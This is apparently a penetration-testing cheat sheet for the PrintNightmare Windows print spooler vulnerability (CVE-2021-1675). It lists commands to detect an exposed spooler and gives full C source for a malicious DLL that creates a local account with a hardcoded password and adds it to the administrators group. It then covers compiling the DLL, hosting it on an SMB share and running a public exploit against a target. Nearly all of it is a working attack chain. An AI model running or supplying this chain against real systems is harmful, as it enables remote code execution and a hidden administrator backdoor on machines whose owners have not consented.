# with cme
nxc smb $target_ip -M spooler
# with impacket
rpcdump.py @$target_ip | egrep 'MS-RPRN|MS-PAR'
Here is the DLL we will use, it creates an user and add it as local administrator βΊοΈ
#include <windows.h>
int RunCMD()
{
system("net users pnightmare Passw0rd123. /add");
system("net localgroup administrators pnightmare /add");
return 0;
}
BOOL APIENTRY DllMain(HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
RunCMD();
break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
x86_64-w64-mingw32-gcc -shared -o nightmare.dll nightmare.c
# clone the repo
git clone https://github.com/cube0x0/CVE-2021-1675 printnightmare
# prepare smb share with the nightmare.dll inside
smbserver.py -smb2support share .
# exploit
python3 CVE-2021-1675.py $domain/$user:$password@$hostnameanddomainname '\\192.168.56.1\share\nightmare.dll'
# verify
cme smb $target_ip -u pnightmare -p 'Passw0rd123.'
